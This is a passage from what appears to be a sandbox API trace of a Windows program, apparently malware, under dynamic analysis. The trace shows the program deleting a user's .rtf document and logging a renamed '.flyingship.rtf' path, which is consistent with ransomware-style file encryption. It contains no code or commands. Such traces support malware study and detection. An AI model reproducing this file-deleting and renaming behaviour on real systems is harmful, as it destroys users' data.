Size=0x10) returned 0x9bd840 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0172.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0172.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.216] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.217] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.217] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.233] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.233] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.234] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.234] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.236] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.236] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.236] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFilePart=0x0) returned 0x46 [0172.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xc04d4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0x90af58 [0172.238] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\hqhniizhaa.rtf")) returned 1 [0172.269] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xc04d4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0 [0172.269] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.269] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.270] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.270] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.270] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.270] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.271] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.271] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.271] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.271] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.272] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.272] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.272] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.272] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.273] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.273] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x102e, lpOverlapped=0x0) returned 1 [0172.273] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.273] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x102e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.274] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0172.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0172.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\n", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\n", lpUsedDefaultChar=0x0) returned 84 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0172.274] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x53, lpOverlapped=0x0) returned 1 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0172.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.274] CloseHandle (hObject=0x120) returned 1 [0172.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900038 | out: hHeap=0x8a0000) returned 1 [0172.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.277] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.278] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.279] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.279] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.280] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.280] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 